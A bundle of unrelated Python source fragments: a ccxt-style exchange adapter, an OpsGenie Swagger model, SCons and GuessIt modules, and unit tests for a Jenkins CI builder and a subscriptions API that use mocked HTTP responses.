id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
ticker = await self.publicGetTicker(self.extend({
'pair': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_trade(self, trade, market):
side = 'buy' if (trade['is_buy']) else 'sell'
return {
'info': trade,
'id': None,
'order': None,
'timestamp': trade['timestamp'],
'datetime': self.iso8601(trade['timestamp']),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': self.safe_float(trade, 'price'),
'amount': self.safe_float(trade, 'volume'),
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
if since is not None:
request['since'] = since
response = await self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response['trades'], market, since, limit)
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privateGetFeeInfo(params)
return {
'info': response,
'maker': self.safe_float(response, 'maker_fee'),
'taker': self.safe_float(response, 'taker_fee'),
}
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
method = 'privatePost'
order = {'pair': self.market_id(symbol)}
if type == 'market':
method += 'Marketorder'
order['type'] = side.upper()
if side == 'buy':
order['counter_volume'] = amount
else:
order['base_volume'] = amount
else:
method += 'Postorder'
order['volume'] = amount
order['price'] = price
if side == 'buy':
order['type'] = 'BID'
else:
order['type'] = 'ASK'
response = await getattr(self, method)(self.extend(order, params))
return {
'info': response,
'id': response['order_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
return await self.privatePostStoporder({'order_id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
if api == 'private':
self.check_required_credentials()
auth = self.encode(self.apiKey + ':' + self.secret)
auth = base64.b64encode(auth)
headers = {'Authorization': 'Basic ' + self.decode(auth)}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = await self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
|
from tests.functional.services.utils.http_utils import http_put, APIResponse
class TestSubscriptionsAPIPutReturns200:
def test_update_subscription(self, add_alpine_subscription):
subscription, api_conf = add_alpine_subscription
resp = http_put(
["subscriptions", subscription.get("subscription_id")],
{"active": False, "subscription_value": "docker.io/alpine:latest"},
config=api_conf,
)
assert resp == APIResponse(200)
|
"""SCons
The main package for the SCons software construction utility.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/__init__.py 2014/07/05 09:42:21 garyo"
__version__ = "2.3.2"
__build__ = ""
__buildsys__ = "lubuntu"
__date__ = "2014/07/05 09:42:21"
__developer__ = "garyo"
# make sure compatibility is always in place
import SCons.compat
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
# coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from opsgenie_swagger.models.base_response import BaseResponse # noqa: F401,E501
from opsgenie_swagger.models.notification_rule_meta import NotificationRuleMeta # noqa: F401,E501
class ListNotificationRulesResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'request_id': 'str',
'took': 'float',
'data': 'list[NotificationRuleMeta]'
}
attribute_map = {
'request_id': 'requestId',
'took': 'took',
'data': 'data'
}
def __init__(self, request_id=None, took=0.0, data=None): # noqa: E501
"""ListNotificationRulesResponse - a model defined in Swagger""" # noqa: E501
self._request_id = None
self._took = None
self._data = None
self.discriminator = None
self.request_id = request_id
self.took = took
if data is not None:
self.data = data
@property
def request_id(self):
"""Gets the request_id of this ListNotificationRulesResponse. # noqa: E501
:return: The request_id of this ListNotificationRulesResponse. # noqa: E501
:rtype: str
"""
return self._request_id
@request_id.setter
def request_id(self, request_id):
"""Sets the request_id of this ListNotificationRulesResponse.
:param request_id: The request_id of this ListNotificationRulesResponse. # noqa: E501
:type: str
"""
if request_id is None:
raise ValueError("Invalid value for `request_id`, must not be `None`") # noqa: E501
self._request_id = request_id
@property
def took(self):
"""Gets the took of this ListNotificationRulesResponse. # noqa: E501
:return: The took of this ListNotificationRulesResponse. # noqa: E501
:rtype: float
"""
return self._took
@took.setter
def took(self, took):
"""Sets the took of this ListNotificationRulesResponse.
:param took: The took of this ListNotificationRulesResponse. # noqa: E501
:type: float
"""
if took is None:
raise ValueError("Invalid value for `took`, must not be `None`") # noqa: E501
self._took = took
@property
def data(self):
"""Gets the data of this ListNotificationRulesResponse. # noqa: E501
:return: The data of this ListNotificationRulesResponse. # noqa: E501
:rtype: list[NotificationRuleMeta]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this ListNotificationRulesResponse.
:param data: The data of this ListNotificationRulesResponse. # noqa: E501
:type: list[NotificationRuleMeta]
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListNotificationRulesResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit.patterns import sep
import re
import logging
log = logging.getLogger(__name__)
def process(mtree):
for node in mtree.unidentified_leaves():
indices = []
didx = 0
pattern = re.compile(sep + '-' + sep)
match = pattern.search(node.value)
while match:
span = match.span()
indices.extend([ span[0], span[1] ])
match = pattern.search(node.value, span[1])
if indices:
node.partition(indices)
|
from __future__ import absolute_import
import json
import mock
import os.path
import responses
import pytest
import time
from datetime import datetime
from flask import current_app
from uuid import uuid5, UUID
from changes.config import db
from changes.constants import Status, Result
from changes.models import (
Artifact, TestCase, Patch, LogSource, LogChunk, Job, JobPhase, FileCoverage,
TestArtifact
)
from changes.backends.jenkins.builder import JenkinsBuilder
from changes.testutils import (
BackendTestCase, eager_tasks, SAMPLE_DIFF, SAMPLE_XUNIT, SAMPLE_COVERAGE,
SAMPLE_XUNIT_TESTARTIFACTS
)
class BaseTestCase(BackendTestCase):
builder_cls = JenkinsBuilder
builder_options = {
'master_urls': ['http://jenkins.example.com'],
'diff_urls': ['http://jenkins-diff.example.com'],
'job_name': 'server',
}
def setUp(self):
self.project = self.create_project()
super(BaseTestCase, self).setUp()
def get_builder(self, **options):
base_options = self.builder_options.copy()
base_options.update(options)
return self.builder_cls(app=current_app, **base_options)
def load_fixture(self, filename):
filepath = os.path.join(
os.path.dirname(__file__),
filename,
)
with open(filepath, 'rb') as fp:
return fp.read()
def uuid5_from(s):
"""
Get a new UUID from an existing hex-encoded Job UUID.
Args:
s (str): Hex-encoded UUID of a Job.
Returns:
str: Hex-encoded UUID derived from the original.
"""
from changes.backends.jenkins.builder import JOB_NAMESPACE_UUID
return uuid5(JOB_NAMESPACE_UUID, s).hex
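# For example (illustrative only; the exact result depends on the value of
# JOB_NAMESPACE_UUID):
#   uuid5_from('81d1596fd4d642f4a6bdf86c45e014e8')  # -> a stable 32-char hex string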
# TODO(dcramer): these tests need to ensure we're passing the right parameters
# to jenkins
class CreateBuildTest(BaseTestCase):
@responses.activate
def test_queued_creation(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'),
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins.example.com/job/server/api/xml/?depth=1&xpath=/queue/item[action/parameter/name=%22CHANGES_BID%22%20and%20action/parameter/value=%22{}%22]/id'.format(jobstep_id),
status=404,
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': None,
'item_id': '13',
'job_name': 'server',
'queued': True,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
def test_active_creation(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
@mock.patch.object(JenkinsBuilder, '_find_job')
def test_patch(self, find_job):
responses.add(
responses.POST, 'http://jenkins-diff.example.com/job/server/build',
body='',
status=201)
find_job.return_value = {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins-diff.example.com',
}
patch = Patch(
repository=self.project.repository,
parent_revision_sha='7ebd1f2d750064652ef5bbff72452cc19e1731e0',
diff=SAMPLE_DIFF,
)
db.session.add(patch)
source = self.create_source(self.project, patch=patch)
build = self.create_build(self.project, source=source)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8')
)
builder = self.get_builder()
builder.create_job(job)
@responses.activate
def test_multi_master(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list.json'),
status=200)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins-2.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins-2.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
@responses.activate
def test_multi_master_one_bad(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
# This one has a failure status.
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body='',
status=503)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins-2.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins-2.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
class CancelStepTest(BaseTestCase):
@responses.activate
def test_queued(self):
responses.add(
responses.POST, 'http://jenkins.example.com/queue/cancelItem?id=13',
match_querystring=True, status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'item_id': 13,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.queued)
builder = self.get_builder()
builder.cancel_step(step)
assert step.result == Result.aborted
assert step.status == Status.finished
@responses.activate
def test_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/stop/',
body='', status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.in_progress)
builder = self.get_builder()
builder.cancel_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
def test_timeouts_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
# The job is not yet complete after this sync step so no logs yet.
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source is None
step.data['timed_out'] = True
builder.cancel_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
class SyncStepTest(BaseTestCase):
@responses.activate
def test_waiting_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_pending.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.queued
@responses.activate
def test_cancelled_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_cancelled.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
def test_queued_to_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
@responses.activate
def test_success_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.passed
assert step.date_finished is not None
@responses.activate
def test_failed_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.failed
assert step.date_finished is not None
@responses.activate
@mock.patch('changes.backends.jenkins.builder.time')
def test_result_slow_log(self, mock_time):
mock_time.time.return_value = time.time()
def log_text_callback(request):
# Zoom 10 minutes into the future; this should cause the console
# downloading code to bail
mock_time.time.return_value += 10 * 60
data = "log\n" * 10000
return (200, {'X-Text-Size': str(len(data))}, data)
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add_callback(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
callback=log_text_callback)
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert len(step.logsources) == 1
chunks = list(LogChunk.query.filter_by(
source=step.logsources[0],
).order_by(LogChunk.offset.asc()))
assert len(chunks) == 2
assert "TOO LONG TO DOWNLOAD" in chunks[1].text
class SyncGenericResultsTest(BaseTestCase):
@responses.activate
def test_does_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
@responses.activate
@mock.patch('changes.backends.jenkins.builder.sync_artifact')
def test_does_fire_sync_artifacts(self, sync_artifact):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
log_artifact = Artifact.query.filter(
Artifact.name == 'foobar.log',
Artifact.step == step,
).first()
assert log_artifact.data == {
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log",
}
sync_artifact.delay_if_needed.assert_any_call(
artifact_id=log_artifact.id.hex,
task_id=log_artifact.id.hex,
parent_task_id=step.id.hex,
skip_checks=False,
)
xunit_artifact = Artifact.query.filter(
Artifact.name == 'tests.xml',
Artifact.step == step,
).first()
assert xunit_artifact.data == {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/tests.xml",
}
sync_artifact.delay_if_needed.assert_any_call(
artifact_id=xunit_artifact.id.hex,
task_id=xunit_artifact.id.hex,
parent_task_id=step.id.hex,
skip_checks=False,
)
class SyncPhasedResultsTest(BaseTestCase):
@responses.activate
def test_does_sync_phases(self):
phase_data = {
"retcode": 0,
"command": ["echo", "foo bar"],
"log": "test.log",
"startTime": 1403645499.39586,
"endTime": 1403645500.398765,
"name": "Test"
}
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_phase_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/test.phase.json',
body=json.dumps(phase_data))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
# the log should still get populated for the existing phase
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
other_phases = list(JobPhase.query.filter(
JobPhase.job_id == job.id,
JobPhase.id != phase.id,
))
assert len(other_phases) == 1
test_phase = other_phases[0]
assert test_phase.label == 'Test'
assert test_phase.result == Result.passed
assert test_phase.status == Status.finished
assert test_phase.date_started == datetime(2014, 6, 24, 21, 31, 39, 395860)
assert test_phase.date_finished == datetime(2014, 6, 24, 21, 31, 40, 398765)
assert len(test_phase.steps) == 1
test_step = test_phase.steps[0]
assert test_step.label == step.label
assert test_step.result == test_phase.result
assert test_step.status == test_phase.status
assert test_step.node == step.node
assert test_step.data == {
'job_name': 'server',
'build_no': 2,
'generated': True,
'master': 'http://jenkins.example.com',
}
assert test_step.date_started == test_phase.date_started
assert test_step.date_finished == test_phase.date_finished
log_artifact = Artifact.query.filter(
Artifact.name == 'test.log',
Artifact.step_id == test_step.id,
).first()
assert log_artifact.data == {
"displayPath": "test.log",
"fileName": "test.log",
"relativePath": "artifacts/test.log",
}
class SyncArtifactTest(BaseTestCase):
@responses.activate
def test_sync_artifact_as_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foobar.log',
body='hello world')
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
